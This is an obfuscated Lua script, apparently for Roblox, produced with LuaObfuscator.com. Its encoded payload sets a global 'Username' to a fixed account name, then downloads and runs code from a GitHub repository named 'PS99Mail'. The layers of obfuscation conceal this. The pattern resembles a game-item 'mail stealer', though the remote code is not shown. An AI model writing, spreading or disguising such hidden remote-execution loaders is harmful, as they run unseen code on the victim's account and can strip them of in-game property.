--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(139 + 416 + 64)))) ;return v82-(v82%(932 -(857 + (951 -(282 + 595))))) ;else local v83=(570 -(367 + 201))^(v32-1) ;return (((v31%(v83 + v83))>=v83) and (928 -(214 + 713))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1640 -(1523 + 114)) );v19=v19 + (1069 -(68 + (1114 -(32 + 85)))) ;return (v37 * (16778486 -(226 + 1044))) + (v36 * (58895 + 6509 + 132)) + (v35 * (1114 -(191 + 667))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38~=(0 -0)) then else v39=0;v40=nil;v38=286 -(134 + 151) ;end if (v38~=(1667 -(970 + 695))) then else local v90=0;while true do if (v90==(0 -0)) then v43=nil;v44=nil;v90=1;end if (v90==1) then v38=3;break;end end end if (v38~=(1991 -(582 + 1408))) then else v41=nil;v42=nil;v38=6 -4 ;end if (v38==(4 -0)) then while true do if (v39==(7 -5)) then local v97=0;local v98;while true do if (0~=v97) then else v98=1824 -(1195 + 629) ;while true do if (v98~=(0 -0)) then else local v124=241 -(187 + 54) ;while true do if (v124~=(780 -(162 + 618))) then else v44=nil;v45=nil;v124=1;end if ((1 + 0)~=v124) then else v98=1 + 0 ;break;end end end if ((1 -0)==v98) then v39=3;break;end end break;end end end if (v39~=(1 -0)) then else local v99=0 + 0 ;while true do if (v99~=1) then else v39=1638 -(1373 + 263) ;break;end if (v99==0) then v42=nil;v43=nil;v99=1;end end end if (v39~=(1000 -(451 + 549))) then else local v100=0 + 0 ;while true do if (v100==0) then v40=0;v41=nil;v100=1 -0 ;end if (v100~=(1 -0)) then else v39=1;break;end end end if (v39~=3) then else v46=nil;while true do local v101=0;local v102;while true do if (v101==(1384 -(746 + 638))) then v102=0;while true do if (v102~=1) then else if (v40==0) then local v158=0 + 0 ;local v159;while true do if (v158==(0 -0)) then v159=0;while true do if (v159==0) then local v170=341 -(218 + 123) ;local v171;while true do if (v170~=(1581 -(1535 + 46))) then else v171=0;while true do if (0==v171) then local v181=0;while true do if (v181~=1) then else v171=1;break;end if (v181==(0 + 0)) then v41={};v42={};v181=1;end end end if ((1 + 0)==v171) then v159=1;break;end end break;end end end if (v159~=(561 -(306 + 254))) then else v43={};v40=1 + 0 ;break;end end break;end end end if (v40~=3) then else local v160=0 -0 ;local v161;local v162;while true do if (v160~=(1468 -(899 + 568))) then else while true do if (v161==0) then v162=0;while true do if (v162~=0) then else local v179=0 + 0 ;local v180;while true do if (v179~=(0 -0)) then else v180=0;while true do if (v180~=(603 -(268 + 335))) then else local v184=0;while true do if (v184==0) then for v197=1,v24() do v42[v197-1 ]=v29();end return v44;end end end end break;end end end end break;end end break;end if (0~=v160) then else v161=290 -(60 + 230) ;v162=nil;v160=573 -(426 + 146) ;end end end break;end if (v102~=0) then else if (v40==(1 + 1)) then local v163=0;local v164;while true do if (v163~=(1456 -(282 + 1174))) then else v164=0;while true do if (v164~=(811 -(569 + 242))) then else local v172=0;local v173;while true do if (0~=v172) then else v173=0 -0 ;while true do if (v173==(0 + 0)) then local v182=0;while true do if (v182==0) then for v186=1,v45 do local v187=1024 -(706 + 318) ;local v188;local v189;local v190;local v191;while true do if (v187~=0) then else v188=0;v189=nil;v187=1252 -(721 + 530) ;end if (v187~=(1272 -(945 + 326))) then else v190=nil;v191=nil;v187=2;end if (2==v187) then while true do if (v188~=1) then else v191=nil;while true do if (v189==(0 -0)) then local v204=0 + 0 ;while true do if (v204==(701 -(271 + 429))) then v189=1 + 0 ;break;end if (v204==(1500 -(1408 + 92))) then v190=v22();v191=nil;v204=1087 -(461 + 625) ;end end end if ((1289 -(993 + 295))==v189) then if (v190==(1 + 0)) then v191=v22()~=0 ;elseif (v190==(1173 -(418 + 753))) then v191=v25();elseif (v190==(2 + 1)) then v191=v26();end v46[v186]=v191;break;end end break;end if (v188~=0) then else local v199=0 + 0 ;while true do if (v199==1) then v188=1 + 0 ;break;end if (v199==(0 + 0)) then v189=0;v190=nil;v199=1;end end end end break;end end end v44[532 -(406 + 123) ]=v22();v182=1770 -(1749 + 20) ;end if (v182==(1 + 0)) then v173=1323 -(1249 + 73) ;break;end end end if (v173==1) then v164=1 + 0 ;break;end end break;end end end if (v164~=1) then else for v174=1,v24() do local v175=1145 -(466 + 679) ;local v176;local v177;local v178;while true do if (v175~=1) then else v178=nil;while true do if (v176~=(0 -0)) then else local v183=0 -0 ;while true do if (1==v183) then v176=1901 -(106 + 1794) ;break;end if (v183==(0 + 0)) then v177=0 + 0 ;v178=nil;v183=1;end end end if (v176==1) then while true do if (v177==0) then v178=v22();if (v21(v178,1,1)~=(0 -0)) then else local v192=0;local v193;local v194;local v195;local v196;while true do if (v192~=(5 -3)) then else while true do if (3==v193) then if (v21(v195,3,3)==1) then v196[4]=v46[v196[118 -(4 + 110) ]];end v41[v174]=v196;break;end if (v193~=1) then else local v201=0;while true do if ((585 -(57 + 527))~=v201) then else v193=1429 -(41 + 1386) ;break;end if (v201~=(103 -(17 + 86))) then else v196={v23(),v23(),nil,nil};if (v194==(0 -0)) then local v208=0;local v209;local v210;while true do if (v208~=1) then else while true do if ((0 -0)==v209) then v210=166 -(122 + 44) ;while true do if (v210==(0 -0)) then v196[9 -6 ]=v23();v196[4 + 0 ]=v23();break;end end break;end end break;end if (v208==0) then v209=0 + 0 ;v210=nil;v208=1 -0 ;end end elseif (v194==1) then v196[68 -(30 + 35) ]=v24();elseif (v194==2) then v196[3]=v24() -((2 + 0)^(1273 -(1043 + 214))) ;elseif (v194==3) then local v217=0 -0 ;local v218;local v219;while true do if (v217==1) then while true do if (v218~=(1212 -(323 + 889))) then else v219=0 -0 ;while true do if (v219~=(580 -(361 + 219))) then else v196[323 -(53 + 267) ]=v24() -((1 + 1)^16) ;v196[417 -(15 + 398) ]=v23();break;end end break;end end break;end if (v217==(982 -(18 + 964))) then v218=0 -0 ;v219=nil;v217=1;end end end v201=1;end end end if (v193==(2 + 0)) then local v202=0 + 0 ;while true do if ((850 -(20 + 830))==v202) then if (v21(v195,1 + 0 ,1)~=(127 -(116 + 10))) then else v196[2]=v46[v196[1 + 1 ]];end if (v21(v195,740 -(542 + 196) ,3 -1 )==(1 + 0)) then v196[2 + 1 ]=v46[v196[3]];end v202=1;end if (v202==1) then v193=2 + 1 ;break;end end end if (v193==0) then local v203=0 -0 ;while true do if (v203~=0) then else v194=v21(v178,4 -2 ,1554 -(1126 + 425) );v195=v21(v178,4,6);v203=1;end if (v203==1) then v193=1;break;end end end end break;end if (v192~=1) then else v195=nil;v196=nil;v192=407 -(118 + 287) ;end if (v192==0) then v193=0 -0 ;v194=nil;v192=1122 -(118 + 1003) ;end end end break;end end break;end end break;end if (v175~=0) then else v176=0;v177=nil;v175=1;end end end v40=3;break;end end break;end end end if (v40~=1) then else local v165=0 -0 ;local v166;local v167;while true do if (v165==1) then while true do if (v166==(377 -(142 + 235))) then v167=0;while true do if (1~=v167) then else v46={};v40=9 -7 ;break;end if (v167==0) then v44={v41,v42,nil,v43};v45=v24();v167=1;end end break;end end break;end if (v165==(0 -0)) then v166=0 + 0 ;v167=nil;v165=1 + 0 ;end end end v102=1 + 0 ;end end break;end end end break;end end break;end if (v38~=(2 + 1)) then else v45=nil;v46=nil;v38=4;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0 + 0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(4 -2)) then v52=v21(v49,58 -37 ,69 -38 );v53=((v21(v49,10 + 22 )==(4 -3)) and  -(754 -(239 + 514))) or (1 + (1504 -(363 + 1141))) ;v47=1332 -(797 + (2112 -(1183 + 397))) ;end if (v47==(1 + 0)) then v50=1 + 0 ;v51=(v21(v49,2 -1 ,1222 -((1135 -762) + 829) ) * (2^(763 -(476 + 255)))) + v48 ;v47=1132 -(271 + 98 + 761) ;end if (v47==(2 + 1)) then if (v52==(0 -0)) then if (v51==(0 -0)) then return v53 * 0 ;else v52=1;v50=238 -(64 + 174) ;end elseif (v52==(292 + 1312 + 443)) then return ((v51==((1975 -(1913 + 62)) -0)) and (v53 * (1/(336 -(144 + 192))))) or (v53 * NaN) ;end return v8(v53,v52-1023 ) * (v50 + (v51/((218 -(42 + 174))^(26 + 14 + 12)))) ;end if (v47==(0 + (0 -0))) then v48=v24();v49=v24();v47=1 + 0 ;end end end v26=nil;function v26(v54)local v55=1933 -(565 + 1368) ;local v56;local v57;while true do if (v55==(7 -(4 + 1))) then v57={};for v91=1662 -((1953 -(41 + 435)) + 184) , #v56 do v57[v91]=v2(v1(v3(v56,v91,v91)));end v55=3 -0 ;end if (v55==(0 + (1001 -(938 + 63)))) then v56=nil;if  not v54 then v54=v24();if (v54==(856 -(434 + 130 + 292))) then return "";end end v55=1;end if (((1129 -(936 + 189)) -1)==v55) then return v6(v57);end if (v55==1) then v56=v3(v16,v19,(v19 + v54) -((1 + 1) -1) );v19=v19 + v54 ;v55=306 -(244 + 60) ;end end end v18=5;end if (v18==2) then function v22()local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + 2 );v19=v19 + (1615 -(1565 + 48)) ;return (v60 * (159 + 97)) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v84=0;while true do if (v84==0) then v20=v0(v3(v61,1,1));return "";end end else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v61,16));if v20 then local v103=v5(v86,v20);v20=nil;return v103;else return v86;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81>0) then local v104=v80[2];v78[v104]=v78[v104](v13(v78,v104 + 1 ,v73));else do return;end end elseif (v81<=2) then v72=v80[3];elseif (v81>3) then local v125=v80[2];v78[v125]=v78[v125](v13(v78,v125 + 1 ,v73));else v78[v80[2]]=v80[3];end elseif (v81<=6) then if (v81>5) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end else local v107=0;local v108;local v109;while true do if (v107==1) then v78[v108 + 1 ]=v109;v78[v108]=v109[v80[4]];break;end if (v107==0) then v108=v80[2];v109=v78[v80[3]];v107=1;end end end elseif (v81<=7) then local v110=0;local v111;local v112;while true do if (v110==1) then v78[v111 + 1 ]=v112;v78[v111]=v112[v80[4]];break;end if (v110==0) then v111=v80[2];v112=v78[v80[3]];v110=1;end end elseif (v81==8) then v78[v80[2]]();else do return;end end elseif (v81<=14) then if (v81<=11) then if (v81==10) then v78[v80[2]]=v80[3];else local v115=0;local v116;local v117;local v118;local v119;while true do if (v115==1) then v73=(v118 + v116) -1 ;v119=0;v115=2;end if (v115==2) then for v154=v116,v73 do local v155=0;while true do if (v155==0) then v119=v119 + 1 ;v78[v154]=v117[v119];break;end end end break;end if (v115==0) then v116=v80[2];v117,v118=v71(v78[v116](v13(v78,v116 + 1 ,v80[3])));v115=1;end end end elseif (v81<=12) then v78[v80[2]]();elseif (v81>13) then v72=v80[3];elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=16) then if (v81>15) then v64[v80[3]]=v78[v80[2]];elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=17) then v64[v80[3]]=v78[v80[2]];elseif (v81>18) then local v136=v80[2];local v137,v138=v71(v78[v136](v13(v78,v136 + 1 ,v80[3])));v73=(v138 + v136) -1 ;local v139=0;for v151=v136,v73 do v139=v139 + 1 ;v78[v151]=v137[v139];end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003083O00557365726E616D6503073O005A2O512O485931030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O00120A3O00013O00260D3O0001000100010004023O0001000100120A000100033O001210000100023O00120F000100043O00120F000200053O00200500020002000600120A000400074O000B000200044O000400013O00022O00080001000100010004023O000E00010004023O000100012O00093O00017O00",v9(),...);
